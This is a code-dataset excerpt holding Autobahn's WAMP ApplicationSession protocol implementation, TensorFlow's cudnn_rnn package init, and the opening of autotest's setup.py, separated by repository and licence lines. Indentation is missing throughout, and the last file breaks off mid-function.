try:
# the following might fail, eg. TypeError when
# signature of exception constructor is incompatible
# with args/kwargs or when the exception constructor raises
if msg.kwargs:
if msg.args:
exc = ecls(*msg.args, **msg.kwargs)
else:
exc = ecls(**msg.kwargs)
else:
if msg.args:
exc = ecls(*msg.args)
else:
exc = ecls()
except Exception:
try:
self.onUserError(
txaio.create_failure(),
"While re-constructing exception",
)
except:
pass
if not exc:
# the following ctor never fails ..
if msg.kwargs:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args, **msg.kwargs)
else:
exc = exception.ApplicationError(msg.error, **msg.kwargs)
else:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args)
else:
exc = exception.ApplicationError(msg.error)
if hasattr(exc, 'enc_algo'):
exc.enc_algo = msg.enc_algo
return exc
class ApplicationSession(BaseSession):
"""
WAMP endpoint session.
"""
log = txaio.make_logger()
def __init__(self, config=None):
"""
Constructor.
"""
BaseSession.__init__(self)
self.config = config or types.ComponentConfig(realm=u"default")
self._transport = None
self._session_id = None
self._realm = None
self._goodbye_sent = False
self._transport_is_closing = False
# outstanding requests
self._publish_reqs = {}
self._subscribe_reqs = {}
self._unsubscribe_reqs = {}
self._call_reqs = {}
self._register_reqs = {}
self._unregister_reqs = {}
# subscriptions in place
self._subscriptions = {}
# registrations in place
self._registrations = {}
# incoming invocations
self._invocations = {}
def set_keyring(self, keyring):
"""
"""
self._keyring = keyring
def onOpen(self, transport):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onOpen`
"""
self._transport = transport
d = txaio.as_future(self.onConnect)
def _error(e):
return self._swallow_error(e, "While firing onConnect")
txaio.add_callbacks(d, None, _error)
def onConnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onConnect`
"""
self.join(self.config.realm)
def join(self, realm, authmethods=None, authid=None, authrole=None, authextra=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.join`
"""
# FIXME
if six.PY2 and type(realm) == str:
realm = six.u(realm)
if six.PY2 and type(authid) == str:
authid = six.u(authid)
if six.PY2 and type(authrole) == str:
authrole = six.u(authrole)
if self._session_id:
raise Exception("already joined")
# store the realm requested by client, though this might be overwritten later,
# when realm redirection kicks in
self._realm = realm
# closing handshake state
self._goodbye_sent = False
# send HELLO message to router
msg = message.Hello(realm, role.DEFAULT_CLIENT_ROLES, authmethods, authid, authrole, authextra)
self._transport.send(msg)
def disconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.disconnect`
"""
if self._transport:
self._transport.close()
def is_connected(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_connected`
"""
return self._transport is not None
def is_attached(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_attached`
"""
return self._session_id is not None
def onUserError(self, fail, msg):
"""
This is called when we try to fire a callback, but get an
exception from user code -- for example, a registered publish
callback or a registered method. By default, this prints the
current stack-trace and then error-message to stdout.
ApplicationSession-derived objects may override this to
provide logging if they prefer. The Twisted implemention does
this. (See :class:`autobahn.twisted.wamp.ApplicationSession`)
:param fail: instance implementing txaio.IFailedFuture
:param msg: an informative message from the library. It is
suggested you log this immediately after the exception.
"""
if isinstance(fail.value, exception.ApplicationError):
self.log.error(fail.value.error_message())
else:
self.log.error(
u'{msg}: {traceback}',
msg=msg,
traceback=txaio.failure_format_traceback(fail),
)
def _swallow_error(self, fail, msg):
'''
This is an internal generic error-handler for errors encountered
when calling down to on*() handlers that can reasonably be
expected to be overridden in user code.
Note that it *cancels* the error, so use with care!
Specifically, this should *never* be added to the errback
chain for a Deferred/coroutine that will make it out to user
code.
'''
try:
self.onUserError(fail, msg)
except:
pass
return None
def onMessage(self, msg):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onMessage`
"""
if self._session_id is None:
# the first message must be WELCOME, ABORT or CHALLENGE ..
if isinstance(msg, message.Welcome):
if msg.realm:
self._realm = msg.realm
self._session_id = msg.session
details = SessionDetails(self._realm, self._session_id, msg.authid, msg.authrole, msg.authmethod, msg.authprovider, msg.authextra)
d = txaio.as_future(self.onJoin, details)
def _error(e):
return self._swallow_error(e, "While firing onJoin")
txaio.add_callbacks(d, None, _error)
elif isinstance(msg, message.Abort):
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, None, _error)
elif isinstance(msg, message.Challenge):
challenge = types.Challenge(msg.method, msg.extra)
d = txaio.as_future(self.onChallenge, challenge)
def success(signature):
if signature is None:
raise Exception('onChallenge user callback did not return a signature')
if type(signature) == six.binary_type:
signature = signature.decode('utf8')
if type(signature) != six.text_type:
raise Exception('signature must be unicode (was {})'.format(type(signature)))
reply = message.Authenticate(signature)
self._transport.send(reply)
def error(err):
self.onUserError(err, "Authentication failed")
reply = message.Abort(u"wamp.error.cannot_authenticate", u"{0}".format(err.value))
self._transport.send(reply)
# fire callback and close the transport
details = types.CloseDetails(reply.reason, reply.message)
d = txaio.as_future(self.onLeave, details)
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, None, _error)
# switching to the callback chain, effectively
# cancelling error (which we've now handled)
return d
txaio.add_callbacks(d, success, error)
else:
raise ProtocolError("Received {0} message, and session is not yet established".format(msg.__class__))
else:
# self._session_id != None (aka "session established")
if isinstance(msg, message.Goodbye):
if not self._goodbye_sent:
# the peer wants to close: send GOODBYE reply
reply = message.Goodbye()
self._transport.send(reply)
self._session_id = None
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def _error(e):
errmsg = 'While firing onLeave for reason "{0}" and message "{1}"'.format(msg.reason, msg.message)
return self._swallow_error(e, errmsg)
txaio.add_callbacks(d, None, _error)
elif isinstance(msg, message.Event):
if msg.subscription in self._subscriptions:
# fire all event handlers on subscription ..
for subscription in self._subscriptions[msg.subscription]:
handler = subscription.handler
topic = msg.topic or subscription.topic
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
# FIXME: behavior in error cases (no keyring, decrypt issues, URI mismatch, ..)
if not self._keyring:
self.log.warn("received encrypted payload, but no keyring active - ignoring encrypted payload!")
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_topic, msg.args, msg.kwargs = self._keyring.decrypt(False, topic, encrypted_payload)
except Exception as e:
self.log.warn("failed to decrypt application payload: {error}", error=e)
else:
if topic != decrypted_topic:
self.log.warn("envelope topic URI does not match encrypted one")
invoke_args = (handler.obj,) if handler.obj else tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if handler.details_arg:
invoke_kwargs[handler.details_arg] = types.EventDetails(publication=msg.publication, publisher=msg.publisher, topic=topic, enc_algo=msg.enc_algo)
def _error(e):
errmsg = 'While firing {0} subscribed under {1}.'.format(
handler.fn, msg.subscription)
return self._swallow_error(e, errmsg)
future = txaio.as_future(handler.fn, *invoke_args, **invoke_kwargs)
txaio.add_callbacks(future, None, _error)
else:
raise ProtocolError("EVENT received for non-subscribed subscription ID {0}".format(msg.subscription))
elif isinstance(msg, message.Published):
if msg.request in self._publish_reqs:
# get and pop outstanding publish request
publish_request = self._publish_reqs.pop(msg.request)
# create a new publication object
publication = Publication(msg.publication, was_encrypted=publish_request.was_encrypted)
# resolve deferred/future for publishing successfully
txaio.resolve(publish_request.on_reply, publication)
else:
raise ProtocolError("PUBLISHED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Subscribed):
if msg.request in self._subscribe_reqs:
# get and pop outstanding subscribe request
request = self._subscribe_reqs.pop(msg.request)
# create new handler subscription list for subscription ID if not yet tracked
if msg.subscription not in self._subscriptions:
self._subscriptions[msg.subscription] = []
subscription = Subscription(msg.subscription, request.topic, self, request.handler)
# add handler to existing subscription
self._subscriptions[msg.subscription].append(subscription)
# resolve deferred/future for subscribing successfully
txaio.resolve(request.on_reply, subscription)
else:
raise ProtocolError("SUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unsubscribed):
if msg.request in self._unsubscribe_reqs:
# get and pop outstanding subscribe request
request = self._unsubscribe_reqs.pop(msg.request)
# if the subscription still exists, mark as inactive and remove ..
if request.subscription_id in self._subscriptions:
for subscription in self._subscriptions[request.subscription_id]:
subscription.active = False
del self._subscriptions[request.subscription_id]
# resolve deferred/future for unsubscribing successfully
txaio.resolve(request.on_reply, 0)
else:
raise ProtocolError("UNSUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Result):
if msg.request in self._call_reqs:
call_request = self._call_reqs[msg.request]
proc = call_request.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(True, proc, encrypted_payload)
except Exception as e:
log_msg = u"failed to decrypt application payload 1: {}".format(e)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_DECRYPT_ERROR, log_msg)
else:
if proc != decrypted_proc:
log_msg = u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_TRUSTED_URI_MISMATCH, log_msg)
if msg.progress:
# process progressive call result
if call_request.options.on_progress:
if enc_err:
self.onUserError(enc_err, "could not deliver progressive call result, because payload decryption failed")
else:
kw = msg.kwargs or dict()
args = msg.args or tuple()
try:
# XXX what if on_progress returns a Deferred/Future?
call_request.options.on_progress(*args, **kw)
except Exception:
try:
self.onUserError(txaio.create_failure(), "While firing on_progress")
except:
pass
else:
# process final call result
# drop original request
del self._call_reqs[msg.request]
# user callback that gets fired
on_reply = call_request.on_reply
# above might already have rejected, so we guard ..
if enc_err:
txaio.reject(on_reply, enc_err)
else:
if msg.kwargs:
if msg.args:
res = types.CallResult(*msg.args, **msg.kwargs)
else:
res = types.CallResult(**msg.kwargs)
txaio.resolve(on_reply, res)
else:
if msg.args:
if len(msg.args) > 1:
res = types.CallResult(*msg.args)
txaio.resolve(on_reply, res)
else:
txaio.resolve(on_reply, msg.args[0])
else:
txaio.resolve(on_reply, None)
else:
raise ProtocolError("RESULT received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Invocation):
if msg.request in self._invocations:
raise ProtocolError("INVOCATION received for request ID {0} already invoked".format(msg.request))
else:
if msg.registration not in self._registrations:
raise ProtocolError("INVOCATION received for non-registered registration ID {0}".format(msg.registration))
else:
registration = self._registrations[msg.registration]
endpoint = registration.endpoint
proc = msg.procedure or registration.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted INVOCATION payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(False, proc, encrypted_payload)
except Exception as e:
log_msg = u"failed to decrypt INVOCATION payload: {}".format(e)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_DECRYPT_ERROR, log_msg)
else:
if proc != decrypted_proc:
log_msg = u"URI within encrypted INVOCATION payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_TRUSTED_URI_MISMATCH, log_msg)
if enc_err:
# when there was a problem decrypting the INVOCATION payload, we obviously can't invoke
# the endpoint, but return and
reply = self._message_from_exception(message.Invocation.MESSAGE_TYPE, msg.request, enc_err)
self._transport.send(reply)
else:
if endpoint.obj is not None:
invoke_args = (endpoint.obj,)
else:
invoke_args = tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if endpoint.details_arg:
if msg.receive_progress:
def progress(*args, **kwargs):
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
raise Exception(u"trying to send encrypted payload, but no keyring active")
encrypted_payload = self._keyring.encrypt(False, proc, args, kwargs)
if encrypted_payload:
progress_msg = message.Yield(msg.request,
payload=encrypted_payload.payload,
progress=True,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
progress_msg = message.Yield(msg.request,
args=args,
kwargs=kwargs,
progress=True)
self._transport.send(progress_msg)
else:
progress = None
invoke_kwargs[endpoint.details_arg] = types.CallDetails(progress, caller=msg.caller, procedure=proc, enc_algo=msg.enc_algo)
on_reply = txaio.as_future(endpoint.fn, *invoke_args, **invoke_kwargs)
def success(res):
del self._invocations[msg.request]
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"trying to send encrypted payload, but no keyring active"
self.log.warn(log_msg)
else:
try:
if isinstance(res, types.CallResult):
encrypted_payload = self._keyring.encrypt(False, proc, res.results, res.kwresults)
else:
encrypted_payload = self._keyring.encrypt(False, proc, [res])
except Exception as e:
log_msg = u"failed to encrypt application payload: {}".format(e)
self.log.warn(log_msg)
if encrypted_payload:
reply = message.Yield(msg.request,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if isinstance(res, types.CallResult):
reply = message.Yield(msg.request,
args=res.results,
kwargs=res.kwresults)
else:
reply = message.Yield(msg.request,
args=[res])
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'success return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
def error(err):
del self._invocations[msg.request]
errmsg = txaio.failure_message(err)
try:
self.onUserError(err, errmsg)
except:
pass
formatted_tb = None
if self.traceback_app:
formatted_tb = txaio.failure_format_traceback(err)
reply = self._message_from_exception(
message.Invocation.MESSAGE_TYPE,
msg.request,
err.value,
formatted_tb,
msg.enc_algo
)
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'error return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
# we have handled the error, so we eat it
return None
self._invocations[msg.request] = InvocationRequest(msg.request, on_reply)
txaio.add_callbacks(on_reply, success, error)
elif isinstance(msg, message.Interrupt):
if msg.request not in self._invocations:
raise ProtocolError("INTERRUPT received for non-pending invocation {0}".format(msg.request))
else:
# noinspection PyBroadException
try:
self._invocations[msg.request].cancel()
except Exception:
# XXX can .cancel() return a Deferred/Future?
try:
self.onUserError(
txaio.create_failure(),
"While cancelling call.",
)
except:
pass
finally:
del self._invocations[msg.request]
elif isinstance(msg, message.Registered):
if msg.request in self._register_reqs:
# get and pop outstanding register request
request = self._register_reqs.pop(msg.request)
# create new registration if not yet tracked
if msg.registration not in self._registrations:
registration = Registration(self, msg.registration, request.procedure, request.endpoint)
self._registrations[msg.registration] = registration
else:
raise ProtocolError("REGISTERED received for already existing registration ID {0}".format(msg.registration))
txaio.resolve(request.on_reply, registration)
else:
raise ProtocolError("REGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unregistered):
if msg.request in self._unregister_reqs:
# get and pop outstanding subscribe request
request = self._unregister_reqs.pop(msg.request)
# if the registration still exists, mark as inactive and remove ..
if request.registration_id in self._registrations:
self._registrations[request.registration_id].active = False
del self._registrations[request.registration_id]
# resolve deferred/future for unregistering successfully
txaio.resolve(request.on_reply)
else:
raise ProtocolError("UNREGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Error):
# remove outstanding request and get the reply deferred/future
on_reply = None
# ERROR reply to CALL
if msg.request_type == message.Call.MESSAGE_TYPE and msg.request in self._call_reqs:
on_reply = self._call_reqs.pop(msg.request).on_reply
# ERROR reply to PUBLISH
elif msg.request_type == message.Publish.MESSAGE_TYPE and msg.request in self._publish_reqs:
on_reply = self._publish_reqs.pop(msg.request).on_reply
# ERROR reply to SUBSCRIBE
elif msg.request_type == message.Subscribe.MESSAGE_TYPE and msg.request in self._subscribe_reqs:
on_reply = self._subscribe_reqs.pop(msg.request).on_reply
# ERROR reply to UNSUBSCRIBE
elif msg.request_type == message.Unsubscribe.MESSAGE_TYPE and msg.request in self._unsubscribe_reqs:
on_reply = self._unsubscribe_reqs.pop(msg.request).on_reply
# ERROR reply to REGISTER
elif msg.request_type == message.Register.MESSAGE_TYPE and msg.request in self._register_reqs:
on_reply = self._register_reqs.pop(msg.request).on_reply
# ERROR reply to UNREGISTER
elif msg.request_type == message.Unregister.MESSAGE_TYPE and msg.request in self._unregister_reqs:
on_reply = self._unregister_reqs.pop(msg.request).on_reply
if on_reply:
txaio.reject(on_reply, self._exception_from_message(msg))
else:
raise ProtocolError("WampAppSession.onMessage(): ERROR received for non-pending request_type {0} and request ID {1}".format(msg.request_type, msg.request))
else:
raise ProtocolError("Unexpected message {0}".format(msg.__class__))
# noinspection PyUnusedLocal
def onClose(self, wasClean):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onClose`
"""
self._transport = None
if self._session_id:
# fire callback and close the transport
d = txaio.as_future(self.onLeave, types.CloseDetails(reason=types.CloseDetails.REASON_TRANSPORT_LOST, message="WAMP transport was lost without closing the session before"))
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, None, _error)
self._session_id = None
d = txaio.as_future(self.onDisconnect)
def _error(e):
return self._swallow_error(e, "While firing onDisconnect")
txaio.add_callbacks(d, None, _error)
def onChallenge(self, challenge):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onChallenge`
"""
raise Exception("received authentication challenge, but onChallenge not implemented")
def onJoin(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onJoin`
"""
return self.fire('join', self, details)
def onLeave(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onLeave`
"""
if details.reason.startswith('wamp.error.'):
self.log.error('{reason}: {wamp_message}', reason=details.reason, wamp_message=details.message)
self.fire('leave', self, details)
if self._transport:
self.disconnect()
# do we ever call onLeave with a valid transport?
def leave(self, reason=None, log_message=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.leave`
"""
if not self._session_id:
raise SessionNotReady(u"session hasn't joined a realm")
if not self._goodbye_sent:
if not reason:
reason = u"wamp.close.normal"
msg = wamp.message.Goodbye(reason=reason, message=log_message)
self._transport.send(msg)
self._goodbye_sent = True
# deferred that fires when transport actually hits CLOSED
is_closed = self._transport is None or self._transport.is_closed
return is_closed
else:
raise SessionNotReady(u"session was alread requested to leave")
def onDisconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onDisconnect`
"""
return self.fire('disconnect', self, True)
def publish(self, topic, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.IPublisher.publish`
"""
if six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(type(topic) == six.text_type)
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.PublishOptions):
raise Exception("options must be of type a.w.t.PublishOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, topic, args, kwargs)
if encrypted_payload:
if options:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs)
if options and options.acknowledge:
# only acknowledged publications expect a reply ..
on_reply = txaio.create_future()
self._publish_reqs[request_id] = PublishRequest(request_id, on_reply, was_encrypted=(encrypted_payload is not None))
else:
on_reply = None
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
# * we have to setup a PublishRequest() in _publish_reqs _before_
# calling transpor.send(), because a mock- or side-by-side transport
# will immediately lead on an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except Exception as e:
if request_id in self._publish_reqs:
del self._publish_reqs[request_id]
raise e
return on_reply
def subscribe(self, handler, topic=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISubscriber.subscribe`
"""
assert((callable(handler) and topic is not None) or hasattr(handler, '__class__'))
if topic and six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(topic is None or type(topic) == six.text_type)
assert(options is None or isinstance(options, types.SubscribeOptions))
if not self._transport:
raise exception.TransportLost()
def _subscribe(obj, fn, topic, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
handler_obj = Handler(fn, obj, options.details_arg if options else None)
self._subscribe_reqs[request_id] = SubscribeRequest(request_id, topic, on_reply, handler_obj)
if options:
msg = message.Subscribe(request_id, topic, **options.message_attr())
else:
msg = message.Subscribe(request_id, topic)
self._transport.send(msg)
return on_reply
if callable(handler):
# subscribe a single handler
return _subscribe(None, handler, topic, options)
else:
# subscribe all methods on an object decorated with "wamp.subscribe"
on_replies = []
for k in inspect.getmembers(handler.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_handler():
uri = pat.uri()
subopts = options or pat.subscribe_options()
on_replies.append(_subscribe(handler, proc, uri, subopts))
# XXX needs coverage
return txaio.gather(on_replies, consume_exceptions=True)
def _unsubscribe(self, subscription):
"""
Called from :meth:`autobahn.wamp.protocol.Subscription.unsubscribe`
"""
assert(isinstance(subscription, Subscription))
assert subscription.active
assert(subscription.id in self._subscriptions)
assert(subscription in self._subscriptions[subscription.id])
if not self._transport:
raise exception.TransportLost()
# remove handler subscription and mark as inactive
self._subscriptions[subscription.id].remove(subscription)
subscription.active = False
# number of handler subscriptions left ..
scount = len(self._subscriptions[subscription.id])
if scount == 0:
# if the last handler was removed, unsubscribe from broker ..
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unsubscribe_reqs[request_id] = UnsubscribeRequest(request_id, on_reply, subscription.id)
msg = message.Unsubscribe(request_id, subscription.id)
self._transport.send(msg)
return on_reply
else:
# there are still handlers active on the subscription!
return txaio.create_future_success(scount)
def call(self, procedure, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.ICaller.call`
"""
if six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(isinstance(procedure, six.text_type))
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.CallOptions):
raise Exception("options must be of type a.w.t.CallOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, procedure, args, kwargs)
if encrypted_payload:
if options:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs)
# FIXME: implement call canceling
# def canceller(_d):
# cancel_msg = message.Cancel(request)
# self._transport.send(cancel_msg)
# d = Deferred(canceller)
on_reply = txaio.create_future()
self._call_reqs[request_id] = CallRequest(request_id, procedure, on_reply, options)
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
# * we have to setup a CallRequest() in _call_reqs _before_
# calling transpor.send(), because a mock- or side-by-side transport
# will immediately lead on an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except:
if request_id in self._call_reqs:
del self._call_reqs[request_id]
raise
return on_reply
def register(self, endpoint, procedure=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ICallee.register`
"""
assert((callable(endpoint) and procedure is not None) or hasattr(endpoint, '__class__'))
if procedure and six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(procedure is None or type(procedure) == six.text_type)
assert(options is None or isinstance(options, types.RegisterOptions))
if not self._transport:
raise exception.TransportLost()
def _register(obj, fn, procedure, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
endpoint_obj = Endpoint(fn, obj, options.details_arg if options else None)
self._register_reqs[request_id] = RegisterRequest(request_id, on_reply, procedure, endpoint_obj)
if options:
msg = message.Register(request_id, procedure, **options.message_attr())
else:
msg = message.Register(request_id, procedure)
self._transport.send(msg)
return on_reply
if callable(endpoint):
# register a single callable
return _register(None, endpoint, procedure, options)
else:
# register all methods on an object decorated with "wamp.register"
on_replies = []
for k in inspect.getmembers(endpoint.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_endpoint():
uri = pat.uri()
on_replies.append(_register(endpoint, proc, uri, options))
# XXX neds coverage
return txaio.gather(on_replies, consume_exceptions=True)
def _unregister(self, registration):
"""
Called from :meth:`autobahn.wamp.protocol.Registration.unregister`
"""
assert(isinstance(registration, Registration))
assert registration.active
assert(registration.id in self._registrations)
if not self._transport:
raise exception.TransportLost()
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unregister_reqs[request_id] = UnregisterRequest(request_id, on_reply, registration.id)
msg = message.Unregister(request_id, registration.id)
self._transport.send(msg)
return on_reply
# IApplicationSession.register collides with the abc.ABCMeta.register method
# IApplicationSession.register(ApplicationSession)
class ApplicationSessionFactory(object):
"""
WAMP endpoint session factory.
"""
session = ApplicationSession
"""
WAMP application session class to be used in this factory.
"""
def __init__(self, config=None):
"""
:param config: The default component configuration.
:type config: instance of :class:`autobahn.wamp.types.ComponentConfig`
"""
self.config = config or types.ComponentConfig(realm=u"default")
def __call__(self):
"""
Creates a new WAMP application session.
:returns: -- An instance of the WAMP application session class as
given by `self.session`.
"""
session = self.session(self.config)
session.factory = self
return session
| mit |
cancan101/tensorflow | tensorflow/contrib/cudnn_rnn/__init__.py | 27 | 1326 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for fused Cudnn RNN models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnGRU
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnLSTM
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnRNNRelu
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnRNNTanh
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import RNNParamsSaveable
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| apache-2.0 |
joyxu/autotest | setup.py | 2 | 4417 | import os
try:
import autotest.common as common
except ImportError:
import common
# High level way of installing each autotest component
import client.setup
import frontend.setup
import cli.setup
import server.setup
import scheduler.setup
import database_legacy.setup
import tko.setup
import utils.setup
import mirror.setup
import installation_support.setup
# pylint: disable=E0611
from distutils.core import setup
from sphinx.setup_command import BuildDoc
cmdclass = {'build_doc': BuildDoc}
from autotest.client.shared import version
def _combine_dicts(list_dicts):
result_dict = {}
for d in list_dicts:
for k in d:
result_dict[k] = d[k]
return result_dict
def _fix_data_paths(package_data_dict):
'''
Corrects package data paths
When the package name is compound, and the package contents, that
is, file paths, contain the same path name found in the package
name, setuptools thinks there's an extra directory. This checks
that condition and adjusts (strips) the 1st directory name.
'''
result = {}
for package_name, package_content in package_data_dict.items():
package_structure = package_name.split('.')
package_structure_1st_level = package_structure[1]
result[package_name] = []
for p in package_content:
path_structure = p.split(os.path.sep)
path_structure_1st_level = path_structure[0]
if package_structure_1st_level == path_structure_1st_level:
path = os.path.join(*path_structure[1:])
else:
path = p
result[package_name].append(path)
return result
def get_package_dir():
return _combine_dicts([client.setup.get_package_dir(),
frontend.setup.get_package_dir(),
cli.setup.get_package_dir(),
server.setup.get_package_dir(),
scheduler.setup.get_package_dir(),
database_legacy.setup.get_package_dir(),
tko.setup.get_package_dir(),
utils.setup.get_package_dir(),
mirror.setup.get_package_dir()])
def get_packages():
return (client.setup.get_packages() +
frontend.setup.get_packages() +
cli.setup.get_packages() +
server.setup.get_packages() +
scheduler.setup.get_packages() +
